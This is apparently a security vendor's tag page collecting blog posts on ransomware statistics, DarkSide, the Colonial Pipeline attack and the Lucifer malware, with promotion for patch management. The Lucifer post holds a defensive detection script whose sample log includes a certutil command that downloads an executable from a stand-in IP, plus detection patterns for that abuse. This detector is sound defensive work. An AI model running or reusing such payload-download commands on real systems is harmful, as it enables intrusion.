Tag: ransomware
Ransomware Is Bad and Getting Worse


A ransomware expert cautions anyone who thinks the ongoing ransomware plague is bad that it is about to get much, much worse.

Changes for Ransomware In 2022

Roger Grimes, a ransomware expert at KnowBe4, cautions anyone who thinks the ongoing ransomware plague is bad that it is about to get much, much worse.

“The cybersecurity industry is not yet capable of implementing a robust defense to even slow the continued increase in cybercrime, much less actually lessen it,” he said.

He noted that ransomware gangs have graduated beyond mere ransom collection. Yes, they still rake in billions. But they are also stealing intellectual property, corporate data, and credentials. In addition, they use the data to threaten the victim’s employees and customers, publicly shame organizations, and exploit their insider information to conduct spear phishing.

In other words, these new tactics mean that backup won’t protect the victims. Yes, a backup may help a company avoid paying the ransom. But the cybercriminals can still leverage all these other avenues to cause real problems – and ultimately force payment.

According to Coveware, 81% of ransomware gangs threaten to leak exfiltrated data. As a result, more than 60% of victims now pay the ransom. The average ransomware payment is up to $280,000 and rising steadily, along with cyber insurance premiums.

And Grimes predicts things will worsen once again. He said the bad guys are maximizing revenue potential by selling stolen data, credentials, access, money, and also going after individuals within companies, as well as organizations as a whole. They have evolved hacking-for-hire schemes, they offer product lists for sale, and in general are acting like a high-end marketing department in exploring and developing innovative new sales channels.

Anyone suffering a ransomware attack, therefore, had better do a thorough forensic examination to see how the attack began, where it spread to laterally, any backdoors introduced, credentials hacked and more. A vulnerability scan should of course be done to determine any remaining vulnerabilities and all of them need to be fixed.


Combined Ransomware Attacks

Two-pronged attacks are becoming common tactics for cybercriminals. They might quietly do some crypto mining on a site and then launch ransomware. Or they can make a ransom demand and at the same time attack the victim’s website, taking down current revenue channels. The resulting financial stress makes it easier to extort the money.

As we move forward, further automation and streamlining of attacks is likely to be observed. For example, a successful incursion using a bot may result in the automatic installation of a malicious program, collection of some passwords, and a scan of the environment to gather key details. At that point, the attack is escalated to senior hackers who research the potential in the environment and determine the most lucrative strategy to exploit. This is similar to how IT is operating today, and how IT is evolving: routine and labor-intensive actions are automated, and alerts and exceptions are passed on to IT personnel to decide what to do.

Just as automation has become the go-to tool for hackers and is being introduced into more and more areas of IT operations and maintenance, it is automation that can help fight the battle against rampant ransomware.

How Syxsense Can Help

Syxsense has automated the entire process of patch management.

  • It automates testing of patches yet gets them deployed within three hours of receipt.
  • It automates patch deployment so the right patches make it to every endpoint.
  • It automates patch rollback in case of any issues or incompatibilities.
  • It automates the prioritization and sequencing of patches so those that represent the biggest threat are sent out first.

Syxsense also automates vulnerability scanning so that scans are done regularly to determine potential issues such as missing patches, open ports, and other vulnerabilities.


Ransomware Becomes a Pandemic


There is a lot of news being generated about the ongoing pandemic. But another pandemic is sweeping the world – ransomware.


Rise of Ransomware

Fortinet’s 2021 Ransomware Survey Report reveals a more than 1000% surge in ransomware between July 2020 and June 2021.

According to the report:

  • Two thirds of organizations have been targeted by ransomware.
  • One in six companies have been hit at least three times.
  • 94% expressed concern about the threat of a ransomware attack, with 76% being very or extremely concerned.
  • 85% are more worried about a ransomware attack than any other cyber threats.
  • 62% consider the top concern of organizations concerning ransomware is the risk of losing data.
  • 38% said loss of productivity and 36% said the interruption of operations were their top concerns.
  • 36% of respondents said the growing sophistication of the threat landscape was among their top five challenges in preventing ransomware.
  • Lack of user awareness and training about cybersecurity hygiene came in at 32% and the difficulties of securing “work from anywhere” employees at 31%.

Despite these statistics, there appears to still be complacency about the problem. Researchers found that despite the volume of attacks and their regular success, 96% of respondents feel at least moderately prepared.

Digging in deeper, however, the survey found that less than half of the respondents have a strategy that includes such things as network segmentation (48%), business continuity measures (41%), a remediation plan (39%), testing of ransomware recovery methods (28%), or red team/blue team exercises (13%) to identify weaknesses in security systems.


Combatting Ransomware

What is to be done to combat ransomware? 91% plan to invest in more employee cyber awareness training. That’s a smart approach, as people tricked into clicking on malicious links and attachments are a primary line of ransomware incursion. But that isn’t enough. Survey respondents said they also look to areas such as threat intelligence, embedded artificial intelligence (AI) for behavioral detection, Secure Web Gateways, VPN, Network Access Controls, and offline backup as key areas of defense.

Perhaps the simplest, most basic, and most effective technology upgrades that should be done to minimize the chances of attack are patch management and vulnerability scanning. This one-two punch provides an essential defensive barrier against most potential incursions. When supported by good user training that hardens employees against phishing attacks and other social engineering scams, organizations are in a strong position to avoid the scourge of ransomware and other malware-borne ills.

How Syxsense Helps

The Syxsense vulnerability scanner is not only a complete security management package, it is automated, repeatable, and generates quick results, delivering security and safety in a timely manner. With security scanning and patch management in one console, Syxsense Secure is the only product that not only shows you what’s wrong, but also deploys the solution.

It offers visibility into OS and third-party vulnerabilities like defects, errors, or misconfigurations of components, while increasing cyber resilience. And it is fully integrated with automated patch management software that lets you easily manage unpatched vulnerabilities with the click of a button.

Syxsense includes patch supersedence, patch roll back, and a wealth of automation features. In addition, it provides a three-hour turnaround for the testing and delivery of new patches as well as technology to send software and patches across the wire once, using peer-to-peer within the network for local distribution.


Start Your Free Trial of Syxsense

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.


The Shocking Truth About Ransomware


Ransomware statistics have been rising for years and organizational IT security procedures and defenses must rise to the challenge.


Ransomware: You Ain’t Seen Nothing Yet

Ransomware statistics have been rising for years. But earlier this year, it appeared that things might be slowing down. There were actually a couple of months when the volume of ransomware attacks dropped.

The thinking at the time was that the bad guys had changed their approach: they were prioritizing attacks on high-value targets rather than conducting generalized phishing campaigns that tried to trick anyone on a computer anywhere.

That theory has been blown out of the water by the latest Global Threat Landscape Report from FortiGuard Labs. It highlights a new explosion in ransomware that is bad news for us all. This portends a future where cybercriminals will greatly expand their use of targeted attacks against high-value organizations, while shot-gunning phishing and ransomware malware from one end of the Web to the other.

Shocking Statistics

The report detailed some shocking statistics:

  • A year ago (June 2020), the average volume of ransomware attacks per week was almost 15,000.
  • In June 2021, the average volume of ransomware attacks per week was almost 150,000, i.e., an increase of 1,000%.
  • About a third of organizations in government, telecom, automotive, and among managed security service providers (MSSPs) experienced ransomware attacks in the past year.
  • Among all other sectors, the average is about 25%.

The conclusion reached by the researchers is that ransomware is a “clear and present danger regardless of industry or size.”

Rising to the Ransomware Challenge

If it is accepted that ransomware is not going away any time soon, then organizational IT security procedures and defenses must rise to the challenge. Fortunately, we have enough historical precedents to give us hope for a future less disrupted by the ransomware scourge:

  • Industrialization filled cities with soot that blackened buildings and filled them with thick smog. London was particularly prone to this about half a century ago. A move to a less polluting form of coal, and then away from coal altogether has eliminated that issue.
  • Acid rain was regarded by many as the world’s biggest problem about 30 years back. Changes in emissions standards have seen it diminish as a challenge.
  • Similarly, the hole in the ozone layer was purported to be the doom of mankind a couple of decades back. Changes to aerosol and other chemical regulations have seen it disappear from the headlines.
  • On the IT side, innovation has steadily conquered problems such as disk fragmentation, how to fix buggy software, simple computer viruses, pop-ups, and a long list of other challenges.

In all likelihood, ransomware is just the latest hurdle that has to be overcome. It may take a year or two more for it to be largely gotten under control. But eventually, enough safeguards will be in place that it will fall from the headlines, although it is likely to remain a threat that IT must stay alert to.

In the meantime, organizations are advised to beef up their security resources: The addition of skilled personnel, importing external help via consultants and MSSPs, and adding effective security defenses. High on the list of these defenses come patching and vulnerability scanning.

How Syxsense Can Help Your Organization

Syxsense reviews, verifies, tests, and issues all patches within three hours of issuance. Its software can automatically deploy those patches to all users and devices.

It also contains a patch rollback function for the rare instance when a problem arises due to a new patch. This is the most efficient way to deal with the onslaught of new patches. By incorporating vulnerability scanning and IT management within one interface, it frees up IT and security personnel to take care of other urgent areas of enterprise security.


Will There Be an End to the Ransomware Pandemic?


Ransomware is the biggest pandemic for IT professionals. It remains the most common type of malware, accounting for nearly 2/3 of malware attacks.


Is There No End to the Ransomware Pandemic?

Pandemics are receiving a lot of media coverage right now. But the one most on the radar of those in IT and security is ransomware. According to the Positive Technologies Q1 2021 Cybersecurity Threatscape report, ransomware remains the most common type of malware, accounting for nearly 2/3 of all malware attacks.

It is easy to see why 2020 was a banner year for ransomware. But the research shows an increase in ransomware in Q1 of 2021 of 17% compared to Q1 of 2020. 77% of the malware consists of targeted attacks against government, industrial, scientific, and educational organizations. The bad guys are after personal data and credentials, as well as stealing commercial secrets.

When IT gets a handle on one type of malware, another strain emerges rapidly. Thus, new pieces of ransomware have emerged of late such as Cring, Humble, and Vovalex. Despite all the new strains, it is sometimes the golden oldies that reap the best rewards. That’s why new variants of WannaCry are causing havoc once again, reprising their heyday back in 2017.

Another successful tactic is to harness rarely used programming languages in order to escape the attention of security scanners and avoid threat prevention technology. To make matters worse, some attackers make use of features that can successfully erase any traces of malicious activity.

Success Breeds Larger Ransoms

In sport, a good season with high numbers often leads to a lucrative contract. It’s the same with ransomware. Following the high-profile attacks on SolarWinds, Kaseya, and the Colonial Pipeline, cybercriminals are now demanding far more in exchange for a return of files, or services. Those who refuse to pay are often subjected to threats to expose the attack and the extent of the data theft to the press, or reveal the hack to the customer base. Alternatively, they find sensitive data and release it to the public, threatening to do more of the same if a ransom is not paid.

While government, education, healthcare, and industry may be in the crosshairs, IT organizations aren’t off the hook. Attacks on IT companies remained high for the second quarter in a row, according to the report. Cybercriminals have also turned their hand to developing malware that infiltrates virtualization environments and virtual infrastructure. This is rich pickings at the moment due to the number of companies that continue to operate remotely.

But perhaps the most lucrative area for attackers is the exploitation of known vulnerabilities. It isn’t hard to imagine cybercriminals sharing tales by the water cooler about being able to infiltrate yet another organization via a well-publicized vulnerability that has had a patch available for two months. A colleague no doubt interrupts to say he got one where the patch was six months old but had never been installed. And then another pipes up with his tale of an uninstalled two-year-old patch that enabled him to hold an organization to ransom.

Shocking as that may sound, it is commonplace for attackers to find a way in by exploiting unpatched systems. It may seem hard to believe, but it’s now more than a year since the SolarWinds attack first made headlines. Yet new victims of this exploit continue to be reported.

How Syxsense Can Help

The first line of defense against ransomware, therefore, is patching. Syxsense lets you easily manage unpatched vulnerabilities with the click of a button. It includes patch supersedence, patch roll back, and a wealth of automation features.

In addition, it provides a three-hour turnaround for the testing and delivery of new patches as well as technology to send software and patches across the wire once, using peer-to-peer within the network for local distribution.


Will the Colonial Pipeline Attack Change User Behavior?


After the Colonial Pipeline ransomware attack, a rapid change in user behavior should be expected. However, this may not be the case.


How Will User Behavior Change After the DarkSide Attack?

Recent ransomware attacks upon infrastructure targets like the Colonial Pipeline have certainly elevated the profile of cybercrime. Justice and policing agencies are giving it far more attention. Companies are taking more steps to avoid the possibility of a ransomware attack.

The mainstream press, not just the IT and security press, are constantly running stories about malware, ransomware, and cybercrime. This has raised awareness of the problem to something that is now very much in the popular consciousness.

Prime-time news stories highlight the dangers of phishing, and tell harrowing stories of individuals and small businesses destroyed by cybercrime after falling victim to social engineering trickery.

Will Users Wise Up?

The obvious conclusion would be that higher awareness would bring about a rapid change in user behavior. Being fed a steady diet of news about the various ways in which people were hoodwinked by various email scams, users would become far more cautious about their own email, website, and security habits.

Sadly, the facts don’t bear this out.

Research on social engineering from security awareness training vendors such as KnowBe4 indicates that people continue to be fooled by phishing emails in more or less the same percentage as before.

More than 10% of users, and by some studies 1 in 3, are prone to be fooled by phishing. All it takes is a moment of inattention and the person clicks on a malicious attachment or link. Even smart people get fooled sometimes.

Malicious Cyber Strategies

To make matters worse, the bad guys continually adjust their tactics. As one particular tactic works well, it gets used a lot and then eventually plays itself out through over-use. The old scam emails from Nigerian banks wanting to pay you millions were once hitting just about every mailbox. People are wise to it. You rarely see it, these days.

The criminals moved on to other approaches such as email subject lines promising lurid details about celebrities or taking advantage of the headlines of the moment.

Another common tactic has been to use logos from corporations, banks, the IRS, FBI, or other government bodies posing as official communications. The idea is to fool the recipient into entering passwords or banking details.

Slightly altered email addresses are another ploy. One letter is added to or removed from the email address, so it looks correct at first glance. Criminals sometimes infiltrate the email account of one employee and use it to send malicious content to other employees, posing as an urgent survey from IT, finance, or HR. Such attacks are often effective.

Some users are alert to these scams and spot them instantly. But many continue to be fooled by them, even at an executive level.

When, Not If

Based on the propensity of some users to be tricked into clicking on malware, the unfortunate reality is that no matter the headlines, no matter the raised awareness, breaches will happen.

Phishing scams will help bad actors to gain entry. Effective security awareness training can bring down the percentage of users who click on bad links or attachments. But it won’t bring it to zero.

How Syxsense Can Help

Such actions must be supported by ever-vigilant IT and security personnel using automated security tools. The organization must continually scan the network for vulnerabilities, unusual patterns, anomalous traffic, and new threats. Patches must be kept up to date with priority given to those with the highest threat level.

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution.

Syxsense Cortex simplifies complex IT and security processes with a drag-and-drop interface. Pre-built templates keep organizations secure without needing large teams, specialists, or scripting.


Ransomware Is Now Terrorism


The U.S. Department of Justice has elevated the status of investigations on ransomware attacks to give them a similar priority to terrorism.


Ransomware Attacks Given Higher U.S. Priority

Those who have been victimized by ransomware have known it for some time. And now the federal government has faced up to the stark reality: ransomware is terrorism.

The U.S. Department of Justice has just elevated the status of investigations on ransomware attacks to give them a similar priority to terrorism. This comes in the aftermath of the Colonial Pipeline hack, a similar attack on the world’s largest meat processor, and a rash of other smaller incidents impacting schools, hospitals, and businesses.

As a result, U.S. attorney’s offices throughout the country have been instructed that any data concerning the investigation of ransomware should be communicated to Washington for the purposes of coordination. It appears that a concerted and coordinated campaign has begun in an attempt to take out this form of cybercrime.

How the U.S. is Responding to Ransomware Attacks

A new task force has been set up in D.C. to address the issue. The goal is to detect patterns, trace common actors, and track down the criminal gangs behind it. This is a necessary move, given the fact that many of these acts are linked to Eastern European and Asian sources. With the federal government involved, pressure can be brought to bear on the police forces of other nations via Interpol, and from the State Department to other government officials.

And it’s about time. The criminals have largely had free rein up until now. Actions have only been taken against them when they went after high profile targets. A few hackers have been arrested over the last couple of years, but not that many when you consider the number of victims.

FBI investigations into cybercrime often lead overseas and that makes effective police action difficult. Hopefully, the new status will foster greater international cooperation as well as greater pressure exacted upon those who tolerate cybercriminals within their borders.

Colonial Pipeline Payback

The new emphasis on ransomware as terrorism seems to have paid immediate dividends. U.S. law enforcement officials managed to recover $2.3 million in bitcoin paid to DarkSide, the criminal gang behind the Colonial Pipeline attack.

“Today we turned the tables on DarkSide,” said Lisa Monaco, a Department of Justice deputy attorney general.

Justice officials identified the virtual currency wallet used to collect payment from Colonial Pipeline and successfully seized what was there. This was possible as the network was in Northern California and within reach of U.S. court orders. It remains to be seen how effective new measures will be if funds have been transferred overseas.

The Best Defense Against Ransomware

Once ransomware has infected systems, the organization concerned is in for a rough ride. Reports can be filed, mitigation actions can be taken, ransoms may even be paid. But when the dust settles, IT and company management will probably feel they have been to hell and back.

The best defense against ransomware, therefore, is not to get infected in the first place. That means deployment of the right mix of security tools, educating users on how to avoid clicking on malware, and making sure all vulnerabilities are known and all patches are up to date.

How Syxsense Can Protect Your Business

Time and again, hackers exploit known vulnerabilities. Systems are continually breached due to well-publicized patches not having been deployed across the network.

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution.

Syxsense Cortex simplifies complex IT and security processes with a drag-and-drop interface. Pre-built templates keep organizations secure without needing large teams, specialists, or scripting.


The Number of Ransomware Victims is Greatly Underreported


It seems hard to believe that ransomware data is underreported. However, reports claim the numbers run far below the actual totals.


Is the number of ransomware victims accurate?

It seems hard to believe that ransomware numbers are underreported. After all, hardly a week goes by without news of another high-profile victim. And most days, there is news of a small business being locked out of its systems.

Yet the eSentire Ransomware Report claims the official numbers run far below the actual totals. The report said that six primary ransomware gangs managed to compromise almost 300 organizations in the first four months of 2021. Researchers estimate that their haul came to close to $50 million and believe that many more victims pay up and manage to avoid publicity.

Their reasons for keeping quiet vary. Some hope to avoid damage to their brand reputation. Another motivation might be maintenance of share price or seeking to avoid publicity that might endanger massive financial deals about to close.

Ransomware Gang Territories

The report estimates that the various groups involved split the booty between them. They each have a different speciality. Each gang focuses on particular industries and regions of the world, according to the report.

The mob behind the Colonial Pipeline attack is known as DarkSide. In the first six months of their existence, they have managed to impact about 100 organizations. Their business model is that of ransomware-as-a-service. They provide freelancers and contractors with tools to infiltrate corporate defenses and then get a cut of the ransom.

The good news is that increased law enforcement scrutiny caused DarkSide to shut down and go underground, at least temporarily. Energy providers have become something of a specialty for DarkSide, with Brazilian electric utility Companhia Paranaense de Energia also held to ransom this year.

Another growing gang is Ryuk/Conti. It has attacked more than 35 organizations since 2018. 63 of them took place this year. Instead of going after energy and infrastructure, their preference is manufacturing, construction, transportation, education, and local government. Recent victims include Broward County School District, CEE Schisler, and government systems in Georgia, Florida, and Indiana. Three of the local governments paid the ransoms (anywhere from $130,000 to $600,000), but the others did not.

Like the Ryuk/Conti gang, the people behind the Sodin/REvil ransomware focus on healthcare organizations while also devoting their efforts to attacking laptop manufacturers. Of their 161 victims, 52 were hit in 2021 and they made international news with attacks on Acer and Quanta, two of the world’s biggest technology manufacturers.

Stern Warning on Ransomware

The eSentire report includes a stern warning:

“Another sobering realization is that no single industry is immune from this ransomware scourge. These debilitating attacks are happening across all regions and all sectors, and it is imperative that all companies and private-sector organizations implement security protections to mitigate the damages stemming from a ransomware attack.”

That includes ensuring all vital patches have been deployed on every server and endpoint, and that no hidden vulnerabilities exist for hackers to exploit.

How to Prevent Ransomware Attacks

Syxsense Secure is a patch management platform that includes IT management and vulnerability scanning in one console. It not only shows you what’s wrong, but also deploys the solution.

Gain visibility into OS and third-party vulnerabilities like defects, errors, or misconfigurations of components, while increasing cyber resilience with automated patching and security scans.


Start Your Free Trial of Syxsense

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.


Would Hamlet Pay a Ransom?



The FBI strongly advises companies to never pay when ransomware strikes. So why do organizations continue to do so in the face of an attack?



Hamlet once pondered, “To be, or not to be. That is the question.”

If the Prince of Denmark lived in the modern world, he would more likely be pondering the impact of ransomware on his kingdom and saying, “To pay, or not to pay. That is the question.”

Government and law enforcement officials are clear about their position. The FBI strongly advises companies never to pay a ransom. It is quite possible that the Justice Department will start fining anyone found to have paid one. Similarly, the UK Home Secretary has publicly stated that the government does not support ransomware victims paying the ransom.

Their logic is simple. Paying the bad guys tells them that ransomware is a great way to accumulate cash. Further, who is to say that the cybercriminals will actually decrypt the organization’s files once the ransom is paid?

Remember all those movie plot lines where the blackmailer keeps coming back for more and more money? The same thing can and has happened in ransomware attacks. When you are dealing with a criminal, there is never any guarantee that they’ll keep their word.

Another ploy used by the bad guys is to threaten to publicly reveal sensitive or embarrassing data or intellectual property (IP) unless a large sum is paid. Even if the ransom is paid, the criminals may cash in again by quietly passing that data to a competitor or a journalist, for a fee of course.

Finally, if attackers have been inside your network, how sure can you be that they haven’t left some form of malware lurking behind? Perhaps a backdoor, or a way to siphon off money quietly. Ransacking every nook and cranny of the enterprise for malware and vulnerabilities is no easy task.

As Polonius observed of Hamlet, “Though this be madness, yet there is method in’t.”

Why Some Pay the Ransom

Colonial Pipeline recently paid almost $5 million. The logic seems clear: the potential revenue losses would have cost the company far more than the ransom demand. Revenue loss is often what motivates payment.

But in local government, healthcare, and education, the driver may be something different: the need to restore vital services. Hospitals need their systems back to care for their patients, after all.

Anyone paying a ransom may also be subject to government fines. Currently that is only a threat. But with many countries running heavy deficits, fining organizations for submitting to ransom demands may come to be seen as another way to fill the coffers.

How Will the Cybercriminals Respond?

If governments continue the rhetoric about not paying, and fines begin to be issued, more and more organizations will resist the temptation to pay the requested ransom.

The Irish national health service (HSE), for example, is currently in a standoff with attackers who have locked it out of many healthcare and social service systems. Ongoing mitigation efforts include shutting down all computer systems, isolating those that were attacked, wiping, rebuilding and updating all infected devices, updating antivirus and other security software, and recovering systems from offsite backups.

If refusal to pay becomes a trend, the ball falls into the court of the criminals. How will they respond? In the old days, anyone failing to pay protection money would see their store vandalized, a family member brutalized, or would become the victim of an arson attack. The cyber-equivalent of some of these would seem to be the obvious response. Time will tell.

The best approach, though, is to be vigilant in doing everything you can to prevent the possibility of a ransomware attack. Patch all systems, keep an eagle eye for potential vulnerabilities, and act whenever one is found.

As Hamlet said, and he might even have been talking about cybercriminals, “Let the doors be shut upon him, that he may play the fool nowhere but in’s own house.”

Find out more about Syxsense, the only tool that combines automated patch management, vulnerability scanning, and IT management.


DarkSide Ransomware Targets US Critical Infrastructure



DarkSide Ransomware interrupted operations at Colonial Pipeline, which provides 45% of the fuel supply for the eastern seaboard of the US.


DarkSide Ransomware Behind Colonial Pipeline Hack

Colonial Pipeline supplies 45% of the fuel for the eastern seaboard of the USA. Early Saturday, reports surfaced that the oil and gas giant had temporarily halted its fuel transport operations due to a cybersecurity breach.

Colonial responded by announcing it was the victim of a targeted ransomware campaign. Although the situation is evolving, reports are coalescing around the organization DarkSide as the source of this security breach.

What is DarkSide?

DarkSide is a highly-coordinated team of offensive cyber security criminals who use their expertise to extort organizations for profit by infecting corporate networks with ransomware.

Ransomware is a form of malware that infects a computer and then encrypts its files, locking the owner out of their own data. Once the files are encrypted, the attacker sends a ransom note to the owner of the infected system. Ransom demands are generally paid in Bitcoin, and if the victim is a large company the demand can run to millions of dollars’ worth.

How Ransomware Attacks Start

Many ransomware attacks start with a simple phishing scam. An unsuspecting user opens a malicious email and clicks a link that infects their computer with the malware. The malware then reaches out to additional resources until it has access to a large part of the organization.

Once the malware has spread widely through the company, it triggers its payload and locks access to the assets it has infected. Although details of the Colonial Pipeline breach are still murky, we know a fair bit about how DarkSide has delivered its malware in the past, and it is much more complex than a standard phishing campaign.

What We Know About the DarkSide Ransomware Group

DarkSide has made a name for itself by performing complex breaches of target networks to deliver its malware. It starts by running automated vulnerability scans against potential victims before selecting a target.

Once a potential target is found, the DarkSide team performs a more thorough audit of the victim’s network, looking for specific vulnerabilities to exploit. If the team finds a viable exploit, it uses it to deliver the malware into the target’s network.

Adding insult to injury, DarkSide does not just encrypt corporate data; it also copies the target’s data to servers DarkSide operates. If the target then restores from backup and refuses to pay, DarkSide releases the sensitive corporate data to the public.

This added layer of criminal extortion has forced the hands of multiple companies and has made the DarkSide approach extremely lucrative for the criminal group.

The Latest with the Colonial Pipeline Hack

On Saturday, Colonial Pipeline reported that they were breached by a ransomware attack. Cyber security experts close to the event informed the media that the company was targeted by DarkSide.

Even though Colonial reported the issue on Saturday, there is reason to believe that DarkSide may have been on their network for significantly longer. Multiple government agencies are now investigating the breach as Colonial works to repair their damaged environments.

Recovering from a ransomware attack like DarkSide’s can be a complex and difficult process. Even after the ransom has been paid or recovery has begun, the network must be thoroughly audited for remaining compromises. That takes time and money. As of Monday morning, much of Colonial’s service is still offline.

How to Protect Your Business from DarkSide Ransomware

The story of Colonial Pipeline is not a new one — this is just the newest chapter in the long history of cyber extortion. But your organization does not have to participate in this story.

The DarkSide intrusion relies on exploitable vulnerabilities found on a target network. Syxsense Secure provides a simple interface for performing vulnerability audits across your entire corporate network. The visibility offered by Syxsense Secure shows your IT and security teams an in-depth view of your company’s vulnerabilities.

Outfits like DarkSide are interested in picking off easy targets. The best defense against DarkSide is a hard-to-breach corporate environment. By remediating vulnerabilities in your organization, you encourage DarkSide and similar cybercriminal outfits to look elsewhere to make their money. Colonial Pipeline has already lost millions of dollars in consulting fees, remediation, and lost revenue because of this breach. Routine vulnerability audits would have made an attack of this kind considerably harder.

Start a free trial to see how Syxsense Cortex can help you defend against DarkSide and other complex ransomware attacks.


Lucifer Malware Targets Windows Systems



Experts have identified a new malware called Lucifer that targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks.


New Malware Exploits Critical Vulnerabilities

A new devilish malware is currently exploiting critical vulnerabilities on Windows devices.

Nicknamed Lucifer, the self-propagating malware targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks. It first tries to infect devices by throwing a battery of exploits at them, in the hope that one of several long-patched vulnerabilities is still present.

“Lucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms,” stated researchers at Palo Alto Networks’ Unit 42 team. “Applying the updates and patches to the affected software is strongly advised.”

In a blog post, the researchers said the latest variant of Lucifer was discovered on May 29 while they were investigating exploitation of CVE-2019-9081, a remote code execution bug in the Laravel Framework. Many other vulnerabilities are exploited as well, including Rejetto HTTP File Server (CVE-2014-6287), Microsoft Windows (CVE-2017-0144, CVE-2017-0145, CVE-2017-8464), Apache Struts (CVE-2017-9791), Oracle WebLogic (CVE-2017-10271), and ThinkPHP (CVE-2018-20062), among others.

How Lucifer Malware Infects Targets

After exploiting one of these vulnerabilities, or brute-forcing its way in with guessed credentials, the malware connects to its command-and-control (C2) server, which can direct it to run arbitrary commands on the compromised device, including launching TCP, UDP, or HTTP denial-of-service attacks. Lucifer also spreads by brute-forcing credentials over IPC, WMI, SMB, and FTP, and by way of MSSQL, RPC, and network shares.

“The targets are Windows hosts on both internet and intranet, given that the attacker is leveraging certutil utility in the payload for malware propagation,” the researchers noted. If SMB is left exposed, Lucifer uses the EternalBlue and EternalRomance exploits to implant the DoublePulsar backdoor on reachable hosts and spread further. Researchers say Lucifer also tries to evade detection and reverse engineering with anti-sandbox checks that look for device drivers, DLLs, and virtual devices associated with analysis environments.
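The two propagation behaviours just described leave distinctive traces on a Windows host: certutil launched with download or decode switches, and bursts of failed network logons from a single source while credentials are brute-forced over SMB (and over MSSQL when Windows authentication is in use; SQL-authentication failures land in SQL Server’s own error log instead and are not covered here). The script below is an added example, not code from this post or from Unit 42. It assumes a constructed, simplified “timestamp|event_id|key=value …” rendering of Sysmon event 1 and Security event 4625 records, and the burst threshold and window are assumptions to tune against your own baseline.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Added example; not code from the post or from Unit 42. It flags two of the
# behaviours attributed to Lucifer above: certutil used as a downloader or
# decoder, and credential brute-forcing over network logons (SMB, and MSSQL
# under Windows authentication, both surface as Security event 4625 with
# LogonType 3). The "timestamp|event_id|key=value ..." format below is a
# constructed, simplified rendering of Sysmon event 1 / Security event 4625.

CERTUTIL_DOWNLOAD_FLAGS = ("-urlcache", "-verifyctl")  # fetch a file from a URL
CERTUTIL_DECODE_FLAGS = ("-decode", "-decodehex")      # unpack a dropped blob

# Constructed sample telemetry (RFC 5737 documentation addresses).
SAMPLE_LOG = r"""
2020-06-11T10:00:01|1|Image=C:\Windows\System32\certutil.exe CommandLine="certutil -urlcache -split -f http://203.0.113.5/x.exe C:\Users\Public\x.exe"
2020-06-11T10:00:03|1|Image=C:\Windows\System32\certutil.exe CommandLine="certutil -decode C:\Users\Public\x.b64 C:\Users\Public\x.exe"
2020-06-11T10:00:04|1|Image=C:\Windows\System32\certutil.exe CommandLine="certutil -store My"
2020-06-11T10:00:05|1|Image=C:\Windows\System32\cmd.exe CommandLine="cmd /c whoami"
2020-06-11T10:20:00|4625|IpAddress=10.0.0.9 TargetUserName=alice LogonType=2
2020-06-11T10:30:00|4625|IpAddress=192.0.2.44 TargetUserName=bob LogonType=3
2020-06-11T10:45:00|4625|IpAddress=192.0.2.44 TargetUserName=bob LogonType=3
""" + "".join(
    # constructed burst: twelve failed network logons from one source in 33 seconds
    f"2020-06-11T10:05:{3 * i:02d}|4625|IpAddress=198.51.100.7 TargetUserName=user{i} LogonType=3\n"
    for i in range(12)
)

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_events(text):
    """Turn the constructed log text into dicts with parsed timestamps and fields."""
    events = []
    for line in text.strip().splitlines():
        ts, event_id, rest = line.split("|", 2)
        fields = {k: v.strip('"') for k, v in FIELD_RE.findall(rest)}
        events.append({"time": datetime.fromisoformat(ts), "id": int(event_id), **fields})
    return events


def detect_certutil_abuse(events):
    """Return (kind, command line) for certutil runs that download or decode payloads."""
    hits = []
    for e in events:
        if e["id"] != 1 or not e.get("Image", "").lower().endswith("\\certutil.exe"):
            continue
        cmd = e.get("CommandLine", "").lower()
        if any(flag in cmd for flag in CERTUTIL_DOWNLOAD_FLAGS) and "http" in cmd:
            hits.append(("certutil-download", e["CommandLine"]))
        elif any(flag in cmd for flag in CERTUTIL_DECODE_FLAGS):
            hits.append(("certutil-decode", e["CommandLine"]))
    return hits


def detect_logon_bruteforce(events, threshold=10, window=timedelta(seconds=60)):
    """Map source IP -> peak number of failed network logons inside any `window`,
    for sources that reach `threshold` (assumed values; tune to your baseline)."""
    by_source = defaultdict(list)
    for e in events:
        if e["id"] == 4625 and e.get("LogonType") == "3":
            by_source[e.get("IpAddress", "?")].append(e["time"])
    flagged = {}
    for src, times in by_source.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):          # sliding window over sorted times
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[src] = peak
    return flagged


if __name__ == "__main__":
    evts = parse_events(SAMPLE_LOG)
    for kind, cmd in detect_certutil_abuse(evts):
        print(f"[{kind}] {cmd}")
    for src, n in detect_logon_bruteforce(evts).items():
        print(f"[logon-bruteforce] {src}: {n} failed network logons inside 60s")
```

The `-store My` invocation and the two slow failures from 192.0.2.44 are deliberately left unflagged: certutil has legitimate certificate-management uses, and a couple of mistyped passwords is not a brute force. In production the same logic runs over Sysmon and Security events shipped to a SIEM rather than over the embedded sample.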

Researchers discovered two versions of the malware: one initiated on May 29 and the other that “wreaked havoc” on June 11. The developer of the malware refers to it as Satan DDoS, but since other malware families already use this name, the researchers at Palo Alto decided “Lucifer” was more fitting.

How to Detect and Avoid Malware

Although malware appears to be growing in sophistication, the researchers recommend that enterprises protect themselves with simple security measures such as applying the necessary security updates and strengthening authentication methods.

Syxsense Manage and Syxsense Secure can resolve vulnerabilities across an entire environment, whether on-premises or remote. A combination of strict security standards and proper offline backups, paired with a secure systems management and security solution, greatly reduces an organization’s exposure to ransomware and other malware.


Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.
